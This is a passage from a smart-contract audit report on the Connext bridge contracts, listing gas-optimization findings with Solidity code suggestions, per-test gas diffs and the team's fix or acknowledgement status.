PortalFacet.sol#L89-L115 Description: repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ,! ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once. Recommendation: Cache s.routerBalances[msg.sender][local] at the beginning: uint256 routerBalance = s.routerBalances[msg.sender][local]; if (routerBalance < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ... s.routerBalances[msg.sender][local] = routerBalance - amountDebited; 88 Connext: Fixed in PR 2504. Spearbit: Verified. +5.4.21 Unrequired if condition Severity: Gas Optimization Context: ConnextPriceOracle.sol#L97 Description: The below if condition is not required as price will always be 0. This is because if contract finds direct price for asset it returns early, otherwise if no direct price then tokenPrice is set to 0. This means for the code ahead tokenPrice will currently be 0. function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { ... uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } if (tokenPrice == 0) { ... } Recommendation: Remove the unrequired if condition - if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; - } Connext: getTokenPrice has been rewritten in the following PR 2232 which takes this issue into consideration. Spearbit: Verified. Related issue +5.4.22 Delete slippage for gas refund Severity: Gas Optimization Context: BridgeFacet.sol#L741 Description: Once s.slippage[_transferId] is read, it's never read again. It can be deleted to get some gas refund. Recommendation: Consider adding this after BridgeFacet.sol#L741: delete s.slippage[_transferId]; Connext: Fixed in PR 2501. Spearbit: Verified. 89 +5.4.23 Emit event at the beginning in _setOwner() Severity: Gas Optimization Context: ProposedOwnable.sol#L166 Description: _setOwner() maintains an extra variable oldOwner just to emit an event later: function _setOwner(address newOwner) internal { address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); } If this emit is done at the beginning, oldOwner can be removed. Recommendation: Apply this diff: function _setOwner(address newOwner) internal { + - emit OwnershipTransferred(_owner, newOwner); address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); - } Connext: Fixed in PR 2503. Spearbit: Verified. +5.4.24 Simplify the assignment logic of _params.normalizedIn in _xcall Severity: Gas Optimization Context: • BridgeFacet.sol#L504-L517 • BridgeFacet.sol#L444-L446 Description / Recommendation: When amount > 0 we should have asset != address(0) since otherwise the call would revert: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } and when amount == 0 _params.normalizedIn is 0 which is the value passed to _xcall from xcall or xcall- IntoLocal. So we can move the calculation for _params.normalizedIn into the if (_amount > 0) { block. 90 if (_amount > 0) { // Transfer funds of input asset to the contract from the user. AssetLogic.handleIncomingAsset(_asset, _amount); // Swap to the local asset from adopted if applicable. // TODO: drop the "IfNeeded", instead just check whether the asset is already local / needs swap here. _params.bridgedAmt = AssetLogic.swapToLocalAssetIfNeeded(key, _asset, local, _amount, ,! _params.slippage); // Get the normalized amount in (amount sent in by user in 18 decimals). _params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note, we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified. +5.4.25 Simplify BridgeFacet._sendMessage by defining _token only when needed Severity: Gas Optimization Context: BridgeFacet.sol#L895-L909 Description: In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. But that is not an issue since _token is only used when !_isCanonical. Recommendation: We suggest moving the casting IBridgeToken(_local) inside that if block: 91 // Get the formatted token ID bytes29 _tokenId = BridgeMessage.formatTokenId(_canonical.domain, _canonical.id); // Remove tokens from circulation on this chain if applicable. if (_amount > 0) { if (!_isCanonical) { // If the token originates on a remote chain, burn the representational tokens on this chain. IBridgeToken(_local).burn(address(this), _amount); } // IFF the token IS the canonical token (i.e. originates on this chain), we lock the input tokens in ,! escrow // in this contract, as an equal amount of representational assets will be minted on the destination ,! chain. // NOTE: The tokens should be in the contract already at this point from xcall. } As a bonus we also save some gas according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -11 (-0.000%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -11 (-0.000%)) test_Connext__unpermissionedCallsWork() (gas: -11 (-0.001%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -11 (-0.001%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -11 (-0.001%)) test_Connext__permissionedCallsWork() (gas: -11 (-0.001%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -11 (-0.001%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -11 (-0.001%)) test_Connext__bridgeFastLocalShouldWork() (gas: -11 (-0.001%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -11 (-0.001%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -11 (-0.001%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -11 (-0.001%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -11 (-0.001%)) test_Connext__zeroValueTransferShouldWork() (gas: -11 (-0.001%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -600 (-0.002%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -11 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -11 (-0.004%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -9 (-0.004%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -11 (-0.004%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -11 (-0.007%)) Overall gas change: -807 (-0.037%) Connext: Solved in PR 2508. Spearbit: Verified. +5.4.26 Using BridgeMessage library in BridgeFacet._sendMessage can be avoid to save gas Severity: Gas Optimization Context: BridgeFacet.sol#L898-L918 Description: The usage of BridgeMessage library to calculate _tokenId, _action, and finally the formatted mes- sage involves lots of unnecessary memory writes, redundant checks, and overall complicates understanding the flow of the codebase. The BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch is at the end with the current implementation supposed to be: 92 abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); Also, it is redundant that the BridgeMessage.Types.Transfer has been passed to dispatch. it does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption both in the origin and destination domains. Recommendation: Remove the BridgeMessage.format... lines from _sendMessage and supply the final mes- sage to dispatch: function _sendMessage( bytes32 _transferId, uint32 _destination, bytes32 _connextion, TokenId memory _canonical, address _local, uint256 _amount, bool _isCanonical ) private returns (bytes32) { IBridgeToken _token = IBridgeToken(_local); // Remove tokens from circulation on this chain if applicable. if (_amount > 0) { if (!_isCanonical) { // If the token originates on a remote chain, burn the representational tokens on this chain. _token.burn(address(this), _amount); } // IFF the token IS the canonical token (i.e. originates on this chain), we lock the input tokens in escrow // in this contract, as an equal amount of representational assets will be minted on the destination chain. // NOTE: The tokens should be in the contract already at this point from xcall. ,! ,! } bytes memory _messageBody = abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); // Send message to destination chain bridge router. bytes32 _messageHash = IOutbox(s.xAppConnectionManager.home()).dispatch( _destination, _connextion, _messageBody ); // return message hash return _messageHash; } And as we can see by the gas diff in test cases, we will save a lot of gas: test_BridgeFacet__execute_worksWithAdopted() (gas: 21 (0.002%)) 93 test_BridgeFacet__execute_worksWithNegativeSlippage() (gas: 21 (0.002%)) test_BridgeFacet__execute_worksWithPositiveSlippage() (gas: 21 (0.002%)) test_BridgeFacet__execute_respectsSlippageOverrides() (gas: 21 (0.002%)) test_BridgeFacet__execute_receiveLocalWorks() (gas: 21 (0.002%)) test_BridgeFacet__execute_calldataFailsLoudlyOnFast() (gas: 7 (0.002%)) test_BridgeFacet__execute_handleAlreadyReconciled() (gas: -6 (-0.002%)) test_BridgeFacet__execute_calldataFailureHandledOnSlow() (gas: -6 (-0.002%)) test_BridgeFacet__execute_failIfNoRoutersAndNotReconciled() (gas: -2 (-0.003%)) test_BridgeFacet__execute_failsIfRouterNotApprovedForPortal() (gas: 7 (0.003%)) test_BridgeFacet__execute_failsIfNoLiquidityAndAaveNotEnabled() (gas: 7 (0.004%)) test_BridgeFacet__execute_failIfSignatureInvalid() (gas: 7 (0.005%)) test_BridgeFacet__execute_failIfSequencerSignatureAndSequencerAddressMismatch() (gas: 7 (0.005%)) test_BridgeFacet__execute_failIfSequencerSignatureInvalid() (gas: 7 (0.005%)) test_BridgeFacet__execute_worksOnCanonical() (gas: 21 (0.005%)) test_BridgeFacet__execute_failIfAlreadyExecuted() (gas: 7 (0.005%)) test_BridgeFacet__execute_worksWithAave() (gas: 21 (0.005%)) test_BridgeFacet__execute_successfulCalldata() (gas: 21 (0.006%)) test_BridgeFacet__execute_worksWithDelegateAsSender() (gas: 21 (0.006%)) test_BridgeFacet__execute_worksWithLocalAsAdopted() (gas: 21 (0.006%)) test_BridgeFacet__execute_worksWithUnapprovedIfNoWhitelist() (gas: 21 (0.007%)) test_BridgeFacet__execute_noCalldataWorks() (gas: 21 (0.007%)) test_BridgeFacet__execute_worksWithEmptyCanonicalIfZeroValue() (gas: 21 (0.007%)) test_BridgeFacet__execute_failIfRouterHasInsufficientFunds() (gas: 16 (0.007%)) test_BridgeFacet__execute_failIfRouterNotApproved() (gas: 7 (0.007%)) test_BridgeFacet__execute_failIfSequencerNotApproved() (gas: 7 (0.008%)) test_BridgeFacet__execute_worksWith0Value() (gas: 21 (0.008%)) test_BridgeFacet__execute_failIfPaused() (gas: 7 (0.009%)) test_BridgeFacet__execute_failIfSenderNotApproved() (gas: 7 (0.009%)) test_BridgeFacet__execute_failIfAnyRouterHasInsufficientFunds() (gas: 43 (0.010%)) test_BridgeFacet__execute_failIfAnySignatureInvalid() (gas: 34 (0.014%)) test_BridgeFacet__execute_failIfSequencerSignatureAndRoutersMismatch() (gas: 34 (0.017%)) test_BridgeFacet__execute_failIfPathLengthGreaterThanMaxRouters() (gas: 52 (0.022%)) test_BridgeFacet__execute_multipath() (gas: 129 (0.023%)) test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -5039 (-0.104%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -5038 (-0.106%)) test_Connext__unpermissionedCallsWork() (gas: -5038 (-0.373%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -5038 (-0.431%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -5038 (-0.431%)) test_Connext__permissionedCallsWork() (gas: -5038 (-0.434%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -5038 (-0.438%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -5038 (-0.439%)) test_Connext__bridgeFastLocalShouldWork() (gas: -5038 (-0.457%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -5039 (-0.458%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -5038 (-0.470%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -5037 (-0.569%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -5038 (-0.583%)) test_Connext__zeroValueTransferShouldWork() (gas: -5038 (-0.603%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -5038 (-1.688%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -5038 (-1.696%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -4031 (-1.722%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -5038 (-1.857%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -576237 (-2.224%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -5037 (-3.209%)) Overall gas change: -670287 (-18.077%) Connext: Solved in PR 2512. Spearbit: Verified. 94 +5.4.27 s.aavePool can be cached to save gas in _backLoan Severity: Gas Optimization Context: PortalFacet.sol#L179-L184 Description: s.aavePool can be cached to save gas by only reading once from the storage. Recommendation: Cache s.aavePool to save some gas: address aPool = s.aavePool; // increase allowance SafeERC20Upgradeable.safeApprove(IERC20Upgradeable(_asset), aPool, 0); SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), aPool, _backing + _fee); // back loan IAavePool(aPool).backUnbacked(_asset, _backing, _fee); gas saved according to test cases: test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -5610 (-0.022%)) test_PortalFacet__repayAavePortal_shouldWorkUsingSwap() (gas: -250 (-0.023%)) test_PortalFacet__repayAavePortalFor_shouldWork() (gas: -250 (-0.024%)) test_PortalFacet__repayAavePortal_works() (gas: -250 (-0.147%)) Overall gas change: -6360 (-0.215%) Connext: Fixed in PR 2513. Spearbit: Verified. +5.4.28 <= or >= when comparing a constant can be converted to < or > to save gas Severity: Gas Optimization Context: General Description: In this context, we are doing the following comparison: X <= C // or X >= C Where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C we can convert <= into < (or >= into >) to avoid extra opcode/bytecodes being produced by the compiler. Recommendation: To turn <= into <, we just need to increment C by 1 and use C+1 on the right-hand side instead (if C is type(uint256).max the comparison can be replaced by true): X < (C+1) or in the case of >= we need to decrement (when C is not 0, when C is 0 the comparison can be replaced by true for unsigned values): X > (C-1) We can either calculate C+1 (or C-1)and use it in our comparison or let the compiler inline this value. Connext: Solved in PR 2514. Spearbit: Verified. 95 +5.4.29 Use memory's scratch space to calculateCanonicalHash Severity: Gas Optimization Context: • AssetLogic.sol#L500-L502 • ArbitrumHubConnector.sol#L167 Description: calculateCanonicalHash uses abi.encode to prepare a memory chuck to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash we can utilize the memory's scratch space [0x00, 0x40) for this regard. Using this approach would prevent from paying for memory expansion costs among other things. Recommendation: calculateCanonicalHash can be changed to: function calculateCanonicalHash(bytes32 _id, uint32 _domain) internal pure returns (bytes32 cHash) { assembly { mstore(0, _id) mstore(0x20, _domain) cHash := keccak256(0, 0x40) } } gas diff according to test cases: test_BridgeFacet__execute_worksWithAdopted() (gas: -140 (-0.012%)) test_BridgeFacet__execute_worksWithNegativeSlippage() (gas: -140 (-0.012%)) test_BridgeFacet__execute_worksWithPositiveSlippage() (gas: -140 (-0.012%)) test_BridgeFacet__execute_respectsSlippageOverrides() (gas: -140 (-0.012%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -139 (-0.012%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -139 (-0.012%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -139 (-0.012%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -139 (-0.012%)) test_BridgeFacet__execute_receiveLocalWorks() (gas: -139 (-0.012%)) test_PortalFacet__repayAavePortal_failsIfRepayTooMuch() (gas: -139 (-0.013%)) test_PortalFacet__repayAavePortal_shouldWorkUsingSwap() (gas: -140 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -140 (-0.013%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -139 (-0.013%)) test_PortalFacet__repayAavePortalFor_shouldWork() (gas: -139 (-0.013%)) test_BridgeFacet__xcall_failIfAssetNotSupported() (gas: -139 (-0.014%)) test_PortalFacet__repayAavePortal_failsIfSwapFailed() (gas: -140 (-0.014%)) test_PortalFacet__repayAavePortalFor_failsIfZeroTotalAmount() (gas: -139 (-0.015%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -831 (-0.017%)) test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -971 (-0.020%)) test_BridgeFacet__execute_multipath() (gas: -139 (-0.025%)) test_BridgeFacet__execute_failIfAnyRouterHasInsufficientFunds() (gas: -129 (-0.031%)) test_BridgeFacet__execute_worksOnCanonical() (gas: -139 (-0.035%)) test_BridgeFacet__execute_worksWithAave() (gas: -140 (-0.036%)) test_BridgeFacet__execute_successfulCalldata() (gas: -140 (-0.039%)) test_BridgeFacet__execute_worksWithDelegateAsSender() (gas: -139 (-0.041%)) test_BridgeFacet__execute_worksWithLocalAsAdopted() (gas: -139 (-0.041%)) test_BridgeFacet__execute_calldataFailsLoudlyOnFast() (gas: -139 (-0.043%)) test_BridgeFacet__execute_worksWithUnapprovedIfNoWhitelist() (gas: -139 (-0.044%)) test_BridgeFacet__execute_noCalldataWorks() (gas: -139 (-0.044%)) test_BridgeFacet__execute_worksWithEmptyCanonicalIfZeroValue() (gas: -140 (-0.045%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -139 (-0.047%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -139 (-0.047%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -112 (-0.048%)) test_BridgeFacet__execute_handleAlreadyReconciled() (gas: -139 (-0.051%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -139 (-0.051%)) test_BridgeFacet__execute_calldataFailureHandledOnSlow() (gas: -139 (-0.052%)) 96 test_InboxFacet__reconcile_fastLiquidityMultipathWorks() (gas: -279 (-0.054%)) test_BridgeFacet__execute_worksWith0Value() (gas: -140 (-0.054%)) test_BridgeFacet__execute_failIfRouterHasInsufficientFunds() (gas: -129 (-0.055%)) test_Connext__permissionedCallsWork() (gas: -692 (-0.060%)) test_BridgeFacet__xcall_failIfCapReachedOnCanoncal() (gas: -138 (-0.060%)) test_Connext__unpermissionedCallsWork() (gas: -833 (-0.062%)) test_BridgeFacet__execute_failsIfRouterNotApprovedForPortal() (gas: -129 (-0.062%)) test_BridgeFacet__execute_failsIfNoLiquidityAndAaveNotEnabled() (gas: -129 (-0.072%)) test_RoutersFacet__addLiquidityForRouter_failsIfHitsCap() (gas: -138 (-0.072%)) test_InboxFacet__reconcile_fastLiquiditySingleRouterWorks() (gas: -279 (-0.074%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -693 (-0.078%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -692 (-0.080%)) test_PortalFacet__repayAavePortal_works() (gas: -140 (-0.082%)) test_InboxFacet__reconcile_failsIfPortalAndNoRouter() (gas: -279 (-0.083%)) test_Connext__zeroValueTransferShouldWork() (gas: -693 (-0.083%)) test_RoutersFacet__addLiquidity_routerIsSender() (gas: -139 (-0.087%)) test_RoutersFacet__addLiquidityForRouter_worksForToken() (gas: -139 (-0.087%)) test_Connext__bridgeFastLocalShouldWork() (gas: -971 (-0.088%)) test_InboxFacet__reconcile_worksPreExecute() (gas: -279 (-0.091%)) test_InboxFacet__reconcile_worksWithLocal() (gas: -279 (-0.091%)) test_InboxFacet__reconcile_failIfCompleted() (gas: -279 (-0.096%)) test_InboxFacet__reconcile_failIfReconciled() (gas: -279 (-0.096%)) test_RoutersFacet__removeRouterLiquidity_worksWithRecipientSet() (gas: -138 (-0.102%)) test_InboxFacet__reconcile_worksWithCanonical() (gas: -279 (-0.113%)) test_RoutersFacet__removeRouterLiquidityFor_works() (gas: -138 (-0.121%)) test_RoutersFacet__removeRouterLiquidity_worksWithToken() (gas: -138 (-0.122%)) test_BridgeFacet__xcall_failInsufficientErc20Tokens() (gas: -139 (-0.123%)) test_BridgeFacet__xcall_failInsufficientErc20Approval() (gas: -138 (-0.125%)) test_PortalFacet__repayAavePortal_failsIfInsufficientAmount() (gas: -139 (-0.160%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -49695 (-0.192%)) test_RoutersFacet__addLiquidityForRouter_failsIfAssetUnapproved() (gas: -138 (-0.199%)) test_AssetLogic__swapToLocalAssetIfNeeded_worksWithAdopted() (gas: -166 (-0.270%)) test_RoutersFacet__addLiquidityForRouter_failsIfRouterUnapproved() (gas: -138 (-0.279%)) test_RoutersFacet__removeRouterLiquidity_failsIfNotEnoughFunds() (gas: -138 (-0.299%)) test_TokenFacet__addStableSwapPool_canDelete() (gas: -138 (-0.313%)) test_TokenFacet__addStableSwapPool_success() (gas: -138 (-0.332%)) test_AssetLogic__swapToLocalAssetIfNeeded_worksWithLocal() (gas: -156 (-1.021%)) test_AssetLogic__swapToLocalAssetIfNeeded_worksIfZero() (gas: -156 (-1.022%)) Overall gas change: -66221 (-7.431%) Reference: View the opcode diff between the 2 different implementations here: godbolt.org Note: We need to make sure that uint32 _domain does not have dirty bytes when passed to this function, other- wise those bytes can change the outcome for the calculated hash. The same recommendation also applies to ArbitrumHubConnector._confirmHash. Connext: Given the increased risk of generating incorrect canonical hashes if this function is used incorrectly in future upgrades, we've chosen not to implement this suggestion. Spearbit: Acknowledged. 97 +5.4.30 isLocalOrigin can be optimized by using a named return parameter Severity: Gas Optimization Context: AssetLogic.sol#L419-L446 Description: isLocalOrigin after getting the code size of _token returns a comparison result as a bool: assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; This last comparison can be avoided if we use a named return variable since the cast to bool type would automat- ically does the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue "Use contract.code.length". Recommendation: In practice if we had used _token.code.length != 0 as the return value and omitted the assembly block, it should be 6 gas more expensive since the compiler (tested with 0.8.13) cleans the _token address before getting the code length: PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND EXTCODESIZE ISZERO ISZERO whereas the original implementation would turn out to be: EXTCODESIZE ISZERO ISZERO We can actually shave off 6 gas from the original implementation by changing it to: function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool result) { // If the token contract WAS deployed by the bridge, it will be stored in this mapping. // If so, the token is NOT of local origin. if (s.representationToCanonical[_token].domain != 0) { return false; } // If the contract was NOT deployed by the bridge, but the contract does exist, then it // IS of local origin. Returns true if code exists at `_addr`. // solhint-disable-next-line no-inline-assembly assembly { result := extcodesize(_token) } } which the part we care about compiles to: EXTCODESIZE Gas saved according to test cases if we go with my suggestion: test_InboxFacet__reconcile_worksWithCanonical() (gas: -6 (-0.002%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -1600 (-0.006%)) Overall gas change: -1606 (-0.009%) For reference: godbolt.org 98 Connext: Following the recommendation provided in "Use contract.code.length" issue for readability in PR 2486. Spearbit: Acknowledged. +5.4.31 The branching decision in AmplificationUtils._getAPrecise can be removed. Severity: Gas Optimization Context: • AmplificationUtils.sol#L49-L66 • SwapUtilsExternal.sol#L152-L169 Description: _getAPrecise uses if/else block to compare a1 to a0. This comparison is unnecessary if we use a more simplified formula to return the interpolated value of a. Recommendation: We can gas optimize and simplify the code like the following: /** * @notice Return A in its raw precision * @dev See the StableSwap paper for details * @param self Swap struct to read from * @return currentA A parameter in its raw precision form */ function _getAPrecise(SwapUtils.Swap storage self) internal view returns (uint256 currentA) { uint256 t1 = self.futureATime; // time when ramp is finished currentA = self.futureA; // final A value when ramp is finished if (block.timestamp < t1) { uint256 t0 = self.initialATime; // time when ramp is started uint256 a0 = self.initialA; // initial A value when ramp is started assembly { currentA := div( add( mul(a0, sub(t1, timestamp())), mul(currentA, sub(timestamp(), t0)) ), sub(t1, t0) ) } } } gas savings according to test files: 99 test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -48 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -64 (-0.001%)) test_StableSwapFacet__removeSwapLiquidityImbalance_failIfPaused() (gas: -8 (-0.003%)) test_StableSwapFacet__removeSwapLiquidity_shouldWork() (gas: -8 (-0.003%)) test_StableSwapFacet__removeSwapLiquidityOneToken_failIfMoreThanLpBalance() (gas: -8 (-0.004%)) test_StableSwapFacet__removeSwapLiquidityImbalance_failIfMoreThanLpBalance() (gas: -16 (-0.007%)) test_SwapAdminFacet__withdrawSwapAdminFess_shouldWorkWithExpectedAmount() (gas: -16 (-0.007%)) test_StableSwapFacet__addSwapLiquidity_shouldWork() (gas: -16 (-0.008%)) test_StableSwapFacet__removeSwapLiquidityOneToken_failIfFrontRun() (gas: -32 (-0.008%)) test_StableSwapFacet__removeSwapLiquidityImbalance_shouldWork() (gas: -24 (-0.008%)) test_StableSwapFacet__removeSwapLiquidityImbalance_failIfFrontRun() (gas: -32 (-0.008%)) test_StableSwapFacet__removeSwapLiquidityOneToken_shouldWork() (gas: -24 (-0.009%)) test_StableSwapFacet__swapExact_shouldWork() (gas: -16 (-0.011%)) test_StableSwapFacet__swap_shouldWork() (gas: -16 (-0.012%)) test_StableSwapFacet__swapExact_failIfNotMinDy() (gas: -24 (-0.013%)) test_StableSwapFacet__swap_failIfNotMinDy() (gas: -24 (-0.014%)) test_StableSwapFacet__removeSwapLiquidityImbalance_failIfNotMatchPoolTokens() (gas: -8 (-0.015%)) test_StableSwapFacet__calculateRemoveSwapLiquidityOneToken_shouldWork() (gas: -16 (-0.020%)) test_StableSwapFacet__calculateSwap_shouldWork() (gas: -16 (-0.027%)) test_AmplificationUtils__rampA_works() (gas: -8 (-0.032%)) test_StableSwapFacet__calculateSwapTokenAmount_shouldWork() (gas: -16 (-0.032%)) test_StableSwapFacet__getSwapVirtualPrice_shouldWork() (gas: -16 (-0.036%)) test_AmplificationUtils__rampA_revertIfFuturePriceTooLarge() (gas: -8 (-0.073%)) test_AmplificationUtils__rampA_revertIfFuturePriceTooSmall() (gas: -8 (-0.074%)) test_StableSwapFacet__getSwapAPrecise() (gas: -16 (-0.150%)) test_StableSwapFacet__getSwapA_shouldWork() (gas: -16 (-0.150%)) test_SwapAdminFacet__stopRampA_shouldWork() (gas: -405 (-0.266%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -107793 (-0.416%)) test_SwapAdminFacet__rampA_shouldWorkWithDownwards() (gas: -2410 (-0.904%)) test_SwapAdminFacet__rampA_shouldWorkWithUpwards() (gas: -2422 (-0.908%)) test_AmplificationUtils__stopRampA_works() (gas: -397 (-1.459%)) test_AmplificationUtils__getA_works() (gas: -397 (-3.239%)) test_AmplificationUtils__getAPrecise_works() (gas: -397 (-3.255%)) test_AmplificationUtils___getAPrecise_works() (gas: -800 (-5.366%)) Overall gas change: -115525 (-16.537%) Note: one of the original tests test_SwapAdminFacet__rampA_shouldWorkWithDownwards actually fails and this is due to rounding errors and how that rounding error is handled using the more concise formula versus the original implementation using branched if/else blocks (a0 ~ a1). The original implementation would return 4794 for this.getSwapAPrecise(_canonicalKey) versus the new solution which returns 4793 and the actual value to a few decimal points is 4793.32027668628. A few assumptions that would need to be checked: • block.timestamp is always greater than or equal to t0. This is true when rampA or stopRampA is used. We need to also check the initialization for t0 = initialATime and any other potential place that might set that value, the invariant block.timestamp >= t0 would need to be checked. This is because in the assembly block the subtraction would not revert in case of an underflow. This would basically guarantee that t 2 [t0, t1) inside the outer if block. • We need to check with the ranges of a0, a1, t0, t1 and block.timestamp the numerator in our new concise formula would not overflow ( t is block.timestamp): Note, we can also check that a0 = a1 to return early. It would add gas overhead for cases where they are not equal. a0(t1 (cid:0) t) + a1(t (cid:0) t0) t1 (cid:0) t0 Connext: Solved by PR 2355. Spearbit: Verified. 100 +5.4.32 Optimize increment in insert() Severity: Gas Optimization Context: Merkle.sol#L76-L81 Description: The increment tree.count in function insert() can be optimized. function insert(Tree storage tree, bytes32 node) internal returns (uint256) { uint256 size = tree.count + 1; ... tree.count = size; ... } Recommendation: Consider changing the code to: function insert(Tree storage tree, bytes32 node) internal returns (uint256) { - + uint256 size = tree.count + 1; uint256 size = ++tree.count; ... tree.count = size; ... - } Connext: Solved in PR 2211. Spearbit: Verified. +5.4.33 Optimize calculation in loop of dequeueVerified Severity: Gas Optimization Context: Queue.sol#L59-L102 